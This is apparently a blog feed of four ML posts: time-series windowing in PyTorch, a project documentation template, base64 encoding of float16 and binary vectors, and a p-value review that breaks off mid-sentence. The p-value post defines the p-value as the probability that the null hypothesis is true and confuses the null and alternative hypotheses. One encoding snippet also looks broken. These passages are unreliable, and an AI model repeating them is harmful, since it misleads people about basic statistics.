Senthilkumar Gopalhttps://sengopal.github.io/2023-10-01T00:00:00-07:00Musings of a machine learning researcher, engineer and leaderFeature data creation for Time Series2023-10-01T00:00:00-07:002023-10-01T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2023-10-01:/posts/feature-data-creation-for-time-series.htmlA quick review of feature creation for time series data.<p>Timeseries data is a list of observations in a constant interval.
This post gives a quick review of how to convert the list of
observations into features and labels to build a ML model to help
predict the next observation.</p>
<h1 id="timeseries-feature-data-extraction">Timeseries feature data
extraction</h1>
<p>For a time series the feature set is effectively a number of values
in the list, with the label being the next value. A range of the
observations will be used as the feature set, called the window size,
where by we would sliced a window of data and training an ML model to
predict the next observation. For a time series data of 10 observations,
we can expand the data set using windowing, where the size of the window
determines the shift by each iteration. This splits the data into
features and labels and the last item of the list being the label for
the feature. We can also shuffle and batch the data using PyTorch
DataLoader.</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode python"><code class="sourceCode python"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a><span class="im">import</span> torch</span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a><span class="im">from</span> torch.utils.data <span class="im">import</span> TensorDataset, DataLoader</span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a></span>
<span id="cb1-4"><a aria-hidden="true" href="#cb1-4" tabindex="-1"></a><span class="co"># Generate a PyTorch tensor with numbers 0 to 9</span></span>
<span id="cb1-5"><a aria-hidden="true" href="#cb1-5" tabindex="-1"></a>data <span class="op">=</span> torch.arange(<span class="dv">10</span>)</span>
<span id="cb1-6"><a aria-hidden="true" href="#cb1-6" tabindex="-1"></a></span>
<span id="cb1-7"><a aria-hidden="true" href="#cb1-7" tabindex="-1"></a><span class="co"># Define window size and shift</span></span>
<span id="cb1-8"><a aria-hidden="true" href="#cb1-8" tabindex="-1"></a>window_size <span class="op">=</span> <span class="dv">5</span></span>
<span id="cb1-9"><a aria-hidden="true" href="#cb1-9" tabindex="-1"></a>shift <span class="op">=</span> <span class="dv">1</span></span>
<span id="cb1-10"><a aria-hidden="true" href="#cb1-10" tabindex="-1"></a></span>
<span id="cb1-11"><a aria-hidden="true" href="#cb1-11" tabindex="-1"></a><span class="co"># Window the data and drop remainder</span></span>
<span id="cb1-12"><a aria-hidden="true" href="#cb1-12" tabindex="-1"></a>windows <span class="op">=</span> [data[i:i <span class="op">+</span> window_size] <span class="cf">for</span> i <span class="kw">in</span> <span class="bu">range</span>(<span class="dv">0</span>, <span class="bu">len</span>(data) <span class="op">-</span> window_size <span class="op">+</span> <span class="dv">1</span>, shift)]</span>
<span id="cb1-13"><a aria-hidden="true" href="#cb1-13" tabindex="-1"></a></span>
<span id="cb1-14"><a aria-hidden="true" href="#cb1-14" tabindex="-1"></a><span class="co"># Flatten the windows</span></span>
<span id="cb1-15"><a aria-hidden="true" href="#cb1-15" tabindex="-1"></a>flat_windows <span class="op">=</span> [window.flatten() <span class="cf">for</span> window <span class="kw">in</span> windows]</span>
<span id="cb1-16"><a aria-hidden="true" href="#cb1-16" tabindex="-1"></a></span>
<span id="cb1-17"><a aria-hidden="true" href="#cb1-17" tabindex="-1"></a><span class="co"># Create tuples with features (first four elements of the window) and labels (last element)</span></span>
<span id="cb1-18"><a aria-hidden="true" href="#cb1-18" tabindex="-1"></a>features <span class="op">=</span> [window[:<span class="op">-</span><span class="dv">1</span>] <span class="cf">for</span> window <span class="kw">in</span> flat_windows]</span>
<span id="cb1-19"><a aria-hidden="true" href="#cb1-19" tabindex="-1"></a>labels <span class="op">=</span> [window[<span class="op">-</span><span class="dv">1</span>] <span class="cf">for</span> window <span class="kw">in</span> flat_windows]</span>
<span id="cb1-20"><a aria-hidden="true" href="#cb1-20" tabindex="-1"></a></span>
<span id="cb1-21"><a aria-hidden="true" href="#cb1-21" tabindex="-1"></a><span class="co"># Convert features and labels to PyTorch tensors</span></span>
<span id="cb1-22"><a aria-hidden="true" href="#cb1-22" tabindex="-1"></a>features_tensor <span class="op">=</span> torch.stack(features)</span>
<span id="cb1-23"><a aria-hidden="true" href="#cb1-23" tabindex="-1"></a>labels_tensor <span class="op">=</span> torch.tensor(labels)</span>
<span id="cb1-24"><a aria-hidden="true" href="#cb1-24" tabindex="-1"></a></span>
<span id="cb1-25"><a aria-hidden="true" href="#cb1-25" tabindex="-1"></a><span class="co"># Create a PyTorch dataset</span></span>
<span id="cb1-26"><a aria-hidden="true" href="#cb1-26" tabindex="-1"></a>dataset <span class="op">=</span> TensorDataset(features_tensor, labels_tensor)</span>
<span id="cb1-27"><a aria-hidden="true" href="#cb1-27" tabindex="-1"></a></span>
<span id="cb1-28"><a aria-hidden="true" href="#cb1-28" tabindex="-1"></a><span class="co"># Shuffle the dataset</span></span>
<span id="cb1-29"><a aria-hidden="true" href="#cb1-29" tabindex="-1"></a>shuffle_indices <span class="op">=</span> torch.randperm(<span class="bu">len</span>(dataset))</span>
<span id="cb1-30"><a aria-hidden="true" href="#cb1-30" tabindex="-1"></a>dataset <span class="op">=</span> TensorDataset(features_tensor[shuffle_indices], labels_tensor[shuffle_indices])</span>
<span id="cb1-31"><a aria-hidden="true" href="#cb1-31" tabindex="-1"></a></span>
<span id="cb1-32"><a aria-hidden="true" href="#cb1-32" tabindex="-1"></a><span class="co"># Create a PyTorch DataLoader</span></span>
<span id="cb1-33"><a aria-hidden="true" href="#cb1-33" tabindex="-1"></a>dataloader <span class="op">=</span> DataLoader(dataset, batch_size<span class="op">=</span><span class="dv">2</span>, shuffle<span class="op">=</span><span class="va">True</span>)</span>
<span id="cb1-34"><a aria-hidden="true" href="#cb1-34" tabindex="-1"></a></span>
<span id="cb1-35"><a aria-hidden="true" href="#cb1-35" tabindex="-1"></a><span class="co"># Print the results</span></span>
<span id="cb1-36"><a aria-hidden="true" href="#cb1-36" tabindex="-1"></a><span class="cf">for</span> x, y <span class="kw">in</span> dataloader:</span>
<span id="cb1-37"><a aria-hidden="true" href="#cb1-37" tabindex="-1"></a> <span class="bu">print</span>(<span class="st">"x = "</span>, x.numpy())</span>
<span id="cb1-38"><a aria-hidden="true" href="#cb1-38" tabindex="-1"></a> <span class="bu">print</span>(<span class="st">"y = "</span>, y.numpy())</span>
<span id="cb1-39"><a aria-hidden="true" href="#cb1-39" tabindex="-1"></a> <span class="bu">print</span>()</span></code></pre></div>
<p>The output for reference</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a><span class="ex">x</span> = [[5 6 7 8]</span>
<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a> <span class="ex">[0</span> 1 2 3]]</span>
<span id="cb2-3"><a aria-hidden="true" href="#cb2-3" tabindex="-1"></a><span class="ex">y</span> = [9 4]</span>
<span id="cb2-4"><a aria-hidden="true" href="#cb2-4" tabindex="-1"></a></span>
<span id="cb2-5"><a aria-hidden="true" href="#cb2-5" tabindex="-1"></a><span class="ex">x</span> = [[1 2 3 4]</span>
<span id="cb2-6"><a aria-hidden="true" href="#cb2-6" tabindex="-1"></a> <span class="ex">[2</span> 3 4 5]]</span>
<span id="cb2-7"><a aria-hidden="true" href="#cb2-7" tabindex="-1"></a><span class="ex">y</span> = [5 6]</span>
<span id="cb2-8"><a aria-hidden="true" href="#cb2-8" tabindex="-1"></a></span>
<span id="cb2-9"><a aria-hidden="true" href="#cb2-9" tabindex="-1"></a><span class="ex">x</span> = [[4 5 6 7]</span>
<span id="cb2-10"><a aria-hidden="true" href="#cb2-10" tabindex="-1"></a> <span class="ex">[3</span> 4 5 6]]</span>
<span id="cb2-11"><a aria-hidden="true" href="#cb2-11" tabindex="-1"></a><span class="ex">y</span> = [8 7]</span></code></pre></div>ML Project Template2023-09-23T00:00:00-07:002023-09-23T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2023-09-23:/posts/ml-project-template.htmlThis post describes a typical machine learning project and ongoing documentation and tracking of its progress.<p>Tracking and documenting an ongoing machine learning project is a
task onto itself. The following is a starting document of all the moving
parts involved in a machine learning project, specializing towards a
specific application such as a recommendation system or a ranking
capability etc.,. A simple forkable copy of this document is available
at https://github.com/sengopal/ml-project-template as well.</p>
<h1 id="model-and-research-documentation-template">Model and Research
Documentation Template</h1>
<h1 id="project-root">Project Root</h1>
<p>This document acts as the index README or the landing page for the
machine learning project. The intent is to capture all the necessary
decision making information and related references in one centralized
document.</p>
<h3 id="versions">Versions</h3>
<ul>
<li><code><next version> - <what change happened and which section></code></li>
<li>v1.0 - created on Sept 30, 2023</li>
</ul>
<h2 id="audience">Audience</h2>
<p>A simple list of interested folks. This section can also use RASCI
(Responsible, Accountable, Supporting, Consulted and Informed) structure
as well as necessary. This section can also include the external team
stakeholders etc.,</p>
<h2 id="goals-and-definitions">1 Goals and Definitions</h2>
<h3 id="business-objectives">1.1 Business Objectives</h3>
<h3 id="vision">1.2 Vision</h3>
<h3 id="impact-metrics">1.3 Impact Metrics</h3>
<p>These are the output business metrics that are targeted for
improvement. For a recommendation sytem this might be Null&Low
queries, MRR, Conversion etc., It is important to identify these
metrics, though the models may not be directly optimized only for these
metrics. <em>These are not the model metrics such as precision or
recall, which will be tracked in model training section.</em></p>
<h3 id="project-scope">1.4 Project Scope</h3>
<p>This section defines the scope of execution impact such as
mobile/desktop, geographies planned, experiments identified, user
segments targeted etc.,</p>
<h3 id="usecases">1.5 Usecases</h3>
<p>Applications and usecases identified to utilize this feature/model
and the method of consumption.</p>
<h3 id="opportunity-sizing-analysis">1.6 Opportunity Sizing
Analysis</h3>
<p>This section captures the opportunity sizing for each usecase
planned. This identifies the approximate improvements in the input and
output metrics with reasonable assumptions.</p>
<h3 id="current-baseline">1.7 Current Baseline</h3>
<p>This section describes the current status of the opportunity output
metrics that is being identified. These act as the baseline to measure
and experiment the model improvements and other hypothesis.</p>
<h3 id="data-reportingbusiness-intelligence-dashboards">1.8 Data
reporting/business intelligence dashboards</h3>
<h2 id="data-analysis">2 Data Analysis</h2>
<h3 id="data-used">2.1 Data used</h3>
<p>Location of the training/validation/test data, data freshness,
SQLs/Hadoop jobs used to create the data.</p>
<h3 id="data-analysis-1">2.2 Data Analysis</h3>
<p>Exploratory analysis of the data being used - their distributions,
any missing data, biases and methods to prevent them. This section also
documents any interesting relationships observed in the data.</p>
<h3 id="data-loading-jobs">2.3 Data loading Jobs</h3>
<p>ETL jobs for data loading and related transformations/conversions</p>
<h3 id="labeled-data-human-annotated-datasets">2.4 Labeled Data / Human
annotated datasets</h3>
<p>Human annotated datasets that act as golden datasets for final model
performance evaluation - their exploratory analysis and locations</p>
<h2 id="machine-learning-model">3 Machine Learning Model</h2>
<h3 id="baselines-for-model-performance">3.1 Baselines for model
performance</h3>
<p>These are the baselines established for model finetuning based on
either off the shelf model weights or any other reference models to be
used as a proxy for the downstream tasks.</p>
<h3 id="literature-review">3.2 Literature review</h3>
<p>This section captures any literature review performed to determine
the variations of models to be experimented, their related notebooks
etc.,</p>
<h3 id="model">3.3 Model <x></x></h3>
<blockquote>
<p><code><X></code> indicates the model variation tracking. These
might be either numbered or a simple identifier can be used as well.</p>
</blockquote>
<p>Model architecture, pretrained weights used, finetuning dataset used
(use reference to section 1.2) 1. Find SoTA model for your problem
domain (if available) and reproduce results, then apply to your dataset
as a second baseline. 2. Track Training methods and metrics (Losses,
epochs etc.,) 3. MLflow or CometML for Training and hyperparameters
tracking 4. Model checkpoint locations 5. Model training and inference
timings 6. Hardware configuration used 7. Dependencies/Libraries -
requirements.txt or a docker image 8. Performance vs. Latency tradeoffs
9. Model export formats and comparison metrics (eg., ONNX or
TF-protobuf) 10. Training improvements (quantizations, smaller model or
dimensions) and comparison metrics</p>
<h3 id="model-evaluation">3.4 Model Evaluation</h3>
<ol type="1">
<li>Evaluation Metrics - training, validation and testing</li>
<li>Experiments conducted and results</li>
<li>Hyperparameter experiments and final parameters identified</li>
<li>Streamlit / Gradio Demos</li>
<li>Model Card - https://modelcards.withgoogle.com/face-detection</li>
<li>Github location for the evaluation notebooks</li>
</ol>
<h3 id="inference-deployments">3.5 Inference Deployments</h3>
<p>Pytorch - code format and styleguide - <a class="uri" href="https://github.com/IgorSusmelj/pytorch-styleguide#recommended-code-structure-for-training-your-model">https://github.com/IgorSusmelj/pytorch-styleguide#recommended-code-structure-for-training-your-model</a></p>
<h3 id="ml-operations">4 ML Operations</h3>
<p>This section documents the ML operation pipelines once the model has
been identified. There should be sub segments created for the below and
track all the information necessary as listed below.</p>
<ol type="1">
<li>Data pipeline architecture - landing page to understand the data
flow and dependencies</li>
<li>Infrastructure diagrams
<ul>
<li>for offline batch inference - kafka topics, downstream identifiers,
capacity estimates, frequency of updates</li>
<li>for online inference - APIs, platform used, capacity (throughput and
latency) and cluster size</li>
</ul></li>
<li>Other Integration specific system dependencies</li>
<li>Various modes of operation and specifics - Batch (Offline), Batch
(Online), Realtime</li>
<li>Airflow, Luigi or any other orchestration</li>
<li>Any additional post processing - vector databases, indexing,
Quanitizations etc.,</li>
<li>Code changes and Deployments - Source code, K8s pods</li>
<li>Instructions for retraining, bulk inferencing etc.,</li>
</ol>
<h3 id="project-execution-and-rollout-plan">5 Project Execution and
Rollout Plan</h3>
<blockquote>
<p>Ideally this document <strong>should not include</strong> execution
status which tracks the current status which is updated very frequently
and represents current state of affairs. there are other project
management tools to do the same.</p>
</blockquote>
<p>This section tracks the intended end state of the model execution and
can also track incremental phases. Phase <x> - Timelines, A/B test,
dependency timelines, Github, Inference endpoints, cURL commands,
notebook links, Jenkins URL, Architecture diagrams, reference to Model
<x> (refer to 3.3)</x></x></p>
<h3 id="outcomes-and-monitoring">6 Outcomes and Monitoring</h3>
<p>This section document the outcomes and results including the
experiments, the variants tested and observations. There should be
subsegment for results of each A/B Test variant, the impact and their
guardrail metrics. This section also should document the observations,
further model inputs and clearly indicate what is the outcome of each
experiment.</p>
<h3 id="monitoring">6.1 Monitoring</h3>
<p>This section tracks the links to monitor the deployed system and data
health. 1. System Monitoring - for throughput, system health, response
time etc., 2. Data Monitoring - coverage, data drift, model metrics
etc.,</p>
<h3 id="playbook-for-faqs-and-commonly-known-issues">6.2 Playbook for
FAQs and commonly known issues</h3>
<h3 id="references">1.7 References</h3>
<p>All other reference links such as 1. Internal documents 2. Refs to
wiki, screenshots, Repos with any sample code 3. External - Inspiring
work, papers for further literature review</p>float16 precision conversion to Base642023-02-20T00:00:00-08:002023-02-20T00:00:00-08:00Senthilkumar Gopaltag:sengopal.github.io,2023-02-20:/posts/float16-precision-conversion-to-base64.htmlThis post discusses the different methods in Python for converting float16 or half-precision floats to base64 and vice versa to ensure lossless transmission of numpy array data.<p>With the advent of vector databases and large model based embeddings,
with dimensions of 768 and 2048, building large scale indexes for
performing ANN and storing these vectors have become expensive
operations. There are many methods of reducing the vector’s memory
footprint such as quantization or even int8. Two such well used methods
are binarization and using half-precision or float16 to store these
vectors. The following are simple code snippets that I collected from
various sources for conversion between these formats to base64 to ensure
lossless transmission over the wire, such as HTTP services.</p>
<h2 id="binarization">Binarization</h2>
<p>Binarization is a simple method which works well for large
dimensional vectors. There are many methods to define the threshold such
as mean or median values per dimension etc., The below is an example of
storing a binary vector as base64 and back, packed in blocks, where each
block consists of 8 bits.</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode python"><code class="sourceCode python"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a><span class="kw">def</span> base64_to_binary_vec(s):</span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a> binary <span class="op">=</span> base64.b64decode(s)</span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a> bits <span class="op">=</span> [<span class="bu">bin</span>(byte)[<span class="dv">2</span>:].zfill(<span class="dv">8</span>) <span class="cf">for</span> byte <span class="kw">in</span> binary]</span>
<span id="cb1-4"><a aria-hidden="true" href="#cb1-4" tabindex="-1"></a> s_bits <span class="op">=</span> <span class="st">''</span>.join(bits)</span>
<span id="cb1-5"><a aria-hidden="true" href="#cb1-5" tabindex="-1"></a> <span class="co"># print(len(s_bits))</span></span>
<span id="cb1-6"><a aria-hidden="true" href="#cb1-6" tabindex="-1"></a> <span class="cf">return</span> s_bits</span>
<span id="cb1-7"><a aria-hidden="true" href="#cb1-7" tabindex="-1"></a></span>
<span id="cb1-8"><a aria-hidden="true" href="#cb1-8" tabindex="-1"></a></span>
<span id="cb1-9"><a aria-hidden="true" href="#cb1-9" tabindex="-1"></a><span class="kw">def</span> convert_binary_tob64(s_vec):</span>
<span id="cb1-10"><a aria-hidden="true" href="#cb1-10" tabindex="-1"></a> <span class="cf">return</span> base64.b64encode(s_vec).decode(<span class="st">"utf-8"</span>)</span>
<span id="cb1-11"><a aria-hidden="true" href="#cb1-11" tabindex="-1"></a></span>
<span id="cb1-12"><a aria-hidden="true" href="#cb1-12" tabindex="-1"></a><span class="kw">def</span> verify_binary_encoding():</span>
<span id="cb1-13"><a aria-hidden="true" href="#cb1-13" tabindex="-1"></a> <span class="co"># binary vector - example 1</span></span>
<span id="cb1-14"><a aria-hidden="true" href="#cb1-14" tabindex="-1"></a> sample_cons_str <span class="op">=</span> <span class="st">"D/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A=="</span></span>
<span id="cb1-15"><a aria-hidden="true" href="#cb1-15" tabindex="-1"></a> <span class="bu">print</span>(base64_to_binary_vec(sample_cons_str))</span>
<span id="cb1-16"><a aria-hidden="true" href="#cb1-16" tabindex="-1"></a></span>
<span id="cb1-17"><a aria-hidden="true" href="#cb1-17" tabindex="-1"></a> <span class="co"># binary vector - example 2</span></span>
<span id="cb1-18"><a aria-hidden="true" href="#cb1-18" tabindex="-1"></a> test_str <span class="op">=</span> <span class="st">'vckIkrUOV/sgvGYNBfCLEimBkRMSSGxA2TESPj7ixDZNofUdJVChxmwDCSKV4TG8EYwQUhOWtRGzMjJ6LbLaVe2nCBJn3wN1LIFwA2ikTpP5DrRCBDFdVYxBkuAKARelzQRNE4QTRLm8WKbMLE1AYLgHpIy1bTtB6tGPRvU6adxDSVjDRlA9XNMlsg0NMB5tRKzLiHoUbwz8B+oNzcC/lA8I3CNyY8JD6kT1eN2Vq+Xt4eTm6AZL3/Cs9lYeG4tjjuzK0ioVMyAaStmsp2MchziKUoYShVQ2qH2HgLoRD9kJjUL7AoBzMivoZTi4jaUfVn6HooiDvAfZt8CpHqxQ0A=='</span></span>
<span id="cb1-19"><a aria-hidden="true" href="#cb1-19" tabindex="-1"></a> <span class="bu">print</span>(base64_to_binary_vec(test_str))</span>
<span id="cb1-20"><a aria-hidden="true" href="#cb1-20" tabindex="-1"></a></span>
<span id="cb1-21"><a aria-hidden="true" href="#cb1-21" tabindex="-1"></a> <span class="co"># binary vector - example 3 - to reconstruct the vector</span></span>
<span id="cb1-22"><a aria-hidden="true" href="#cb1-22" tabindex="-1"></a> s_vec <span class="op">=</span> []</span>
<span id="cb1-23"><a aria-hidden="true" href="#cb1-23" tabindex="-1"></a> <span class="cf">for</span> i <span class="kw">in</span> <span class="bu">range</span>(<span class="dv">0</span>, <span class="dv">2048</span> <span class="op">//</span> (<span class="dv">8</span> <span class="op">*</span> <span class="dv">2</span>)):</span>
<span id="cb1-24"><a aria-hidden="true" href="#cb1-24" tabindex="-1"></a> s_vec <span class="op">+=</span> [<span class="dv">1</span>,<span class="dv">1</span>,<span class="dv">1</span>,<span class="dv">1</span>,<span class="dv">0</span>,<span class="dv">0</span>,<span class="dv">0</span>,<span class="dv">0</span>,<span class="dv">0</span>,<span class="dv">0</span>,<span class="dv">0</span>,<span class="dv">0</span>,<span class="dv">1</span>,<span class="dv">1</span>,<span class="dv">1</span>,<span class="dv">1</span>]</span>
<span id="cb1-25"><a aria-hidden="true" href="#cb1-25" tabindex="-1"></a></span>
<span id="cb1-26"><a aria-hidden="true" href="#cb1-26" tabindex="-1"></a> b64_str <span class="op">=</span> convert_binary_tob64(s_vec)</span>
<span id="cb1-27"><a aria-hidden="true" href="#cb1-27" tabindex="-1"></a> <span class="co"># print(b64_str)</span></span>
<span id="cb1-28"><a aria-hidden="true" href="#cb1-28" tabindex="-1"></a> <span class="cf">assert</span> (b64_str <span class="op">==</span> sample_cons_str)</span>
<span id="cb1-29"><a aria-hidden="true" href="#cb1-29" tabindex="-1"></a></span>
<span id="cb1-30"><a aria-hidden="true" href="#cb1-30" tabindex="-1"></a> s_vec_recreate <span class="op">=</span> base64_to_binary_vec(b64_str)</span>
<span id="cb1-31"><a aria-hidden="true" href="#cb1-31" tabindex="-1"></a> <span class="co"># print(len(s_vec_recreate))</span></span>
<span id="cb1-32"><a aria-hidden="true" href="#cb1-32" tabindex="-1"></a> <span class="co"># print(s_vec_recreate)</span></span>
<span id="cb1-33"><a aria-hidden="true" href="#cb1-33" tabindex="-1"></a> s_vec_expected <span class="op">=</span> <span class="st">''</span>.join([<span class="st">'0'</span> <span class="cf">if</span> val <span class="cf">else</span> <span class="st">'1'</span> <span class="cf">for</span> val <span class="kw">in</span> s_vec])</span>
<span id="cb1-34"><a aria-hidden="true" href="#cb1-34" tabindex="-1"></a> <span class="co"># print(s_vec_expected)</span></span>
<span id="cb1-35"><a aria-hidden="true" href="#cb1-35" tabindex="-1"></a> <span class="cf">assert</span>(s_vec_recreate <span class="op">==</span> s_vec_expected)</span></code></pre></div>
<h2 id="float-16-to-base64-conversion">Float 16 to Base64
conversion</h2>
<p>The below is an example of storing a float 16 vector as base64 and
back to the float16 vector without any loss of data.</p>
<p>There are multiple methods for float16 to base64 conversion.</p>
<h3 id="method-1---using-numpy-buffer">Method 1 - using Numpy
buffer</h3>
<div class="sourceCode" id="cb2"><pre class="sourceCode python"><code class="sourceCode python"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a><span class="kw">def</span> convert_f16_to_b64_m1(arr):</span>
<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a> a <span class="op">=</span> np.array(arr, np.float16)</span>
<span id="cb2-3"><a aria-hidden="true" href="#cb2-3" tabindex="-1"></a> <span class="cf">return</span> base64.b64encode(a.tobytes())</span>
<span id="cb2-4"><a aria-hidden="true" href="#cb2-4" tabindex="-1"></a></span>
<span id="cb2-5"><a aria-hidden="true" href="#cb2-5" tabindex="-1"></a><span class="kw">def</span> convert_b64_to_f16(emb):</span>
<span id="cb2-6"><a aria-hidden="true" href="#cb2-6" tabindex="-1"></a> binary <span class="op">=</span> base64.b64decode(emb)</span>
<span id="cb2-7"><a aria-hidden="true" href="#cb2-7" tabindex="-1"></a> <span class="bu">print</span>(binary)</span>
<span id="cb2-8"><a aria-hidden="true" href="#cb2-8" tabindex="-1"></a> q <span class="op">=</span> np.frombuffer(binary, dtype<span class="op">=</span>np.float16)</span>
<span id="cb2-9"><a aria-hidden="true" href="#cb2-9" tabindex="-1"></a> <span class="bu">print</span>(q.shape)</span>
<span id="cb2-10"><a aria-hidden="true" href="#cb2-10" tabindex="-1"></a> <span class="cf">return</span> q</span>
<span id="cb2-11"><a aria-hidden="true" href="#cb2-11" tabindex="-1"></a></span>
<span id="cb2-12"><a aria-hidden="true" href="#cb2-12" tabindex="-1"></a><span class="kw">def</span> verify_f16_encoding_m1():</span>
<span id="cb2-13"><a aria-hidden="true" href="#cb2-13" tabindex="-1"></a> b64_emb <span class="op">=</span> convert_f16_to_b64_m1([<span class="fl">1.2345</span>])</span>
<span id="cb2-14"><a aria-hidden="true" href="#cb2-14" tabindex="-1"></a> <span class="cf">assert</span> (np.isclose([<span class="fl">1.2345</span>], convert_b64_to_f16(b64_emb), atol<span class="op">=</span><span class="fl">1e-2</span>))</span></code></pre></div>
<h3 id="method-2---using-struct-pack">Method 2 - using Struct pack</h3>
<div class="sourceCode" id="cb3"><pre class="sourceCode python"><code class="sourceCode python"><span id="cb3-1"><a aria-hidden="true" href="#cb3-1" tabindex="-1"></a><span class="kw">def</span> convert_f16_to_b64_m2(arr):</span>
<span id="cb3-2"><a aria-hidden="true" href="#cb3-2" tabindex="-1"></a> packer <span class="op">=</span> struct.Struct(<span class="st">"<96e"</span>)</span>
<span id="cb3-3"><a aria-hidden="true" href="#cb3-3" tabindex="-1"></a> vector_array <span class="op">=</span> np.array(arr, dtype<span class="op">=</span>np.float16).tolist()</span>
<span id="cb3-4"><a aria-hidden="true" href="#cb3-4" tabindex="-1"></a> vector_bytes <span class="op">=</span> packer.pack(<span class="op">*</span>vector_array)</span>
<span id="cb3-5"><a aria-hidden="true" href="#cb3-5" tabindex="-1"></a> <span class="cf">return</span> base64.b64encode(vector_bytes)</span>
<span id="cb3-6"><a aria-hidden="true" href="#cb3-6" tabindex="-1"></a></span>
<span id="cb3-7"><a aria-hidden="true" href="#cb3-7" tabindex="-1"></a><span class="kw">def</span> verify_f16_encoding_m2():</span>
<span id="cb3-8"><a aria-hidden="true" href="#cb3-8" tabindex="-1"></a> arr <span class="op">=</span> np.random.normal(<span class="dv">0</span>, <span class="fl">0.01</span>, <span class="dv">96</span>).astype(<span class="st">'float16'</span>)</span>
<span id="cb3-9"><a aria-hidden="true" href="#cb3-9" tabindex="-1"></a> b64_emb <span class="op">=</span> convert_f16_to_b64_m2(<span class="bu">list</span>(arr))</span>
<span id="cb3-10"><a aria-hidden="true" href="#cb3-10" tabindex="-1"></a> <span class="cf">assert</span>(np.isclose(arr, convert_b64_to_f16(b64_emb), atol<span class="op">=</span><span class="fl">1e-2</span>).<span class="bu">all</span>())</span></code></pre></div>
<h3 id="method-3---using-dtype-indicator">Method 3 - using dtype
indicator</h3>
<p>Based on the method described at <a href="https://numpy.org/doc/stable/reference/arrays.dtypes.html">arrays.dtypes.html</a>,
<code><f2</code> is supposed to be faster than struct.</p>
<div class="sourceCode" id="cb4"><pre class="sourceCode python"><code class="sourceCode python"><span id="cb4-1"><a aria-hidden="true" href="#cb4-1" tabindex="-1"></a><span class="kw">def</span> convert_f16_to_b64_m3(arr):</span>
<span id="cb4-2"><a aria-hidden="true" href="#cb4-2" tabindex="-1"></a> <span class="co"># using f2 is faster</span></span>
<span id="cb4-3"><a aria-hidden="true" href="#cb4-3" tabindex="-1"></a> a <span class="op">=</span> np.array(arr, dtype<span class="op">=</span>np.dtype(<span class="st">'<f2'</span>))</span>
<span id="cb4-4"><a aria-hidden="true" href="#cb4-4" tabindex="-1"></a> <span class="cf">return</span> base64.b64encode(a.tobytes())</span>
<span id="cb4-5"><a aria-hidden="true" href="#cb4-5" tabindex="-1"></a></span>
<span id="cb4-6"><a aria-hidden="true" href="#cb4-6" tabindex="-1"></a><span class="kw">def</span> verify_f16_encoding_m3():</span>
<span id="cb4-7"><a aria-hidden="true" href="#cb4-7" tabindex="-1"></a> arr <span class="op">=</span> np.random.normal(<span class="dv">0</span>, <span class="fl">0.01</span>, <span class="dv">96</span>).astype(<span class="st">'float16'</span>)</span>
<span id="cb4-8"><a aria-hidden="true" href="#cb4-8" tabindex="-1"></a> b64_emb <span class="op">=</span> convert_f16_to_b64_m3(<span class="bu">list</span>(arr))</span>
<span id="cb4-9"><a aria-hidden="true" href="#cb4-9" tabindex="-1"></a> <span class="cf">assert</span>(np.isclose(arr, convert_b64_to_f16(b64_emb), atol<span class="op">=</span><span class="fl">1e-5</span>).<span class="bu">all</span>())</span></code></pre></div>
<h3 id="conclusion">Conclusion</h3>
<p>The same can be achieved using <a href="https://stackoverflow.com/questions/6162651/half-precision-floating-point-in-java">Java/Scala</a>
as well.</p>
<h3 id="citation">Citation</h3>
<p>To refer to this post, please cite it as:</p>
<pre><code>Float16 precision conversion to Base64 for lossless transmission | Senthilkumar Gopal.
https://sengopal.github.io/posts/float16-precision-conversion-to-base64.html</code></pre>review-of-p-value2023-01-12T00:00:00-08:002023-01-12T00:00:00-08:00Senthilkumar Gopaltag:sengopal.github.io,2023-01-12:/posts/review-of-p-value.htmlThis post describes a review of the basics regarding p-value<p>p-value is one of the most commonly used statistical test and value
used for experimentation. The standard definition of p-value <strong>is
the probability that the null hypothesis is true.</strong> p-value
represents the probability that the world (created with math equations),
gives evidence supporting the null hypothesis i.e., p-value shows how
consistent the data is with the null hypothesis. So a lower p-value,
ridicules the null hypothesis while a large p-value gives no reason to
change the default action based on the null hypothesis.</p>
<h3 id="drug-test">Drug Test</h3>
<p>Using [1] as reference, in a Drug test between A and B, the null
hypothesis is that both Drugs A and B are the same. So a low p-value
shows that these two drugs are different, defeating the null hypothesis.
Typically a p-value of 0.05 is used as a threshold, though this is
arbitrary. A p-value of 0.05 means that on multiple runs of the
experiment, only 5% or less times would the null hypothesis would be
true, that both the drugs are same.</p>
<ul>
<li>Null Hypothesis: The drug are the same and patients react the same
way</li>
<li>Alternate Hypothesis: The drugs are dissimilar and cures the disease
with varying degrees</li>
</ul>
<h3 id="computing-p-value">Computing p-value</h3>
<p>As referenced from [2], a different test is conducted where the same
drug A is being given to two different groups. Null Hypothesis: The drug
has no effect and groups would have different reactions Alternate
Hypothesis: The drug cures the disease and groups would be similar</p>
<p>As per the null hypothesis, the p-value would be higher as the
